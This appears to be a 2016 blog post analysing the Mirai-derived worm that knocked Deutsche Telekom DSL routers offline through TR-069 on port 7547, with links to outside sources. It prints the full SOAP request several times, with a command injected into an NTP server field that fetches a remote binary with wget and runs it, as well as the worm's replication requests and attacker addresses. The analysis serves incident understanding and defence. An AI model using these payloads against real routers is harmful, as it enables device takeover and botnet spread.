Todays Telekom problems

[Update]
This is a pretty nice description and summary: https://isc.sans.edu/forums/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759

The malware seems to be a descendant of the Mirai Linux worm
https://www.virustotal.com/en/file/7e84a8a74e93e567a6e7f781ab5764fe3bbc12c868b89e5c5c79924d5d5742e2/analysis/

which is described here
https://en.wikipedia.org/wiki/Mirai_(malware)
or here
https://www.incapsula.com/blog/malware-analysis-mirai-ddos-botnet.html

[/Update]

Many German Deutsche Telekom customers had connectivity problems tonight. Some people claimed that they could use their network again after changing the DNS server in their hosts. Most people got their boxes working again (for some time) after a reboot. Telekom communicated many misleading and conflicting information. Events are summarized here:

https://www.heise.de/newsticker/meldung/Grossstoerung-im-Telekom-Netz-3505820.html

I found some interesting facts here
https://www.heise.de/forum/Netze/News-Kommentare/Grossstoerung-im-Telekom-Netz/Re-15-08-2014-Millionen-DSL-Router-durch-TR-069-Fernwartung-kompromittierbar/posting-29559291/show/

From everything I saw it seems that some attacker sends a TR 69 xml command like

<?xml version="1.0"?>
<SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body> <u:SetNTPServers
xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget
http://l.ocalhost.host/1;chmod 777 1;./1`</NewNTPServer1>
<NewNTPServer2/> <NewNTPServer3/> <NewNTPServer4/>
        <NewNTPServer5/>
    </u:SetNTPServers>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

I still try to get information if this comes from inside the Telekom network or the outside. The number of access requests is declining since tonight:
https://www.heise.de/forum/Netze/News-Kommentare/Grossstoerung-im-Telekom-Netz/TR-069/posting-29558928/show/

It seems that Telekom now blocks Port 7547 tcp from the outside.

The URL seems to differ a bit. The server has IP
212.92.127.146 at the moment. People say it used to be 188.209.49.168.
(https://www.heise.de/forum/Netze/News-Kommentare/Grossstoerung-im-Telekom-Netz-dauert-an/Re-port-7547-scans-auf-Digitalisierungsbox/posting-29559739/show/).

Anyway, obviously this tries to inject some shell code via a bug first discovered here:
https://devicereversing.wordpress.com/2016/11/07/eirs-d1000-modem-is-wide-open-to-being-hacked/

First of all this changes the DNS server to some bullshit which explains the DNS problems… Second this loads a MIPS binary (SHA1:
60b0b1631b1c7112b34f6850f60fc62e95174428) into the ramdisk in /tmp and executes it. If the binary does not inject sth. permanently the show will be over after a reboot. So also this phenomenon is explained.

But now, what does the binary do? I just looked at the strings output and one thing is to disable the TR 69 port via

iptables -A INPUT -p tcp --destination-port 7547 -j DROP

and send some status information to a (for me) still unknown receiver:

POST /
HTTP/1.1
Myname--is:
Host:
Cookie:
http
url=

There is at least a second version of the binary (sha1:
feb6531b4509015a3a119f67b290175b284e9864) that additionally disables a locally running telnet daemon and seems to replicate itself via 2 different URLs:

POST /UD/act?1 HTTP/1.1
Host: 127.0.0.1:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 526
<?xml version="1.0"?><SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>  <u:SetNTPServers
xmlns:u="urn:dslforum-org:service:Time:1">
<NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/1;chmod 777
1;./1`</NewNTPServer1>   <NewNTPServer2></NewNTPServer2>
<NewNTPServer3></NewNTPServer3>   <NewNTPServer4></NewNTPServer4>
<NewNTPServer5></NewNTPServer5>  </u:SetNTPServers>
</SOAP-ENV:Body></SOAP-ENV:Envelope>

POST /UD/act?1 HTTP/1.1
Host: 127.0.0.1:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml Content-Length: 526

<?xml version="1.0"?><SOAP-ENV:Envelope  
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>  <u:SetNTPServers
xmlns:u="urn:dslforum-org:service:Time:1">
<NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/2;chmod 777
2;./2`</NewNTPServer1>   <NewNTPServer2></NewNTPServer2>
<NewNTPServer3></NewNTPServer3>   <NewNTPServer4></NewNTPServer4>
<NewNTPServer5></NewNTPServer5>  </u:SetNTPServers>
</SOAP-ENV:Body></SOAP-ENV:Envelope>

In one forum it was said that Telekom tries to use the same bug to inject an iptables command that closes the TR 69 port and hopes to be faster then the attackers. I’m still trying to get confirmation about this :).

https://www.heise.de/forum/Netze/News-Kommentare/Grossstoerung-im-Telekom-Netz/Misfortune-Cookie-neuaufgelegt/posting-29560638/show/

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s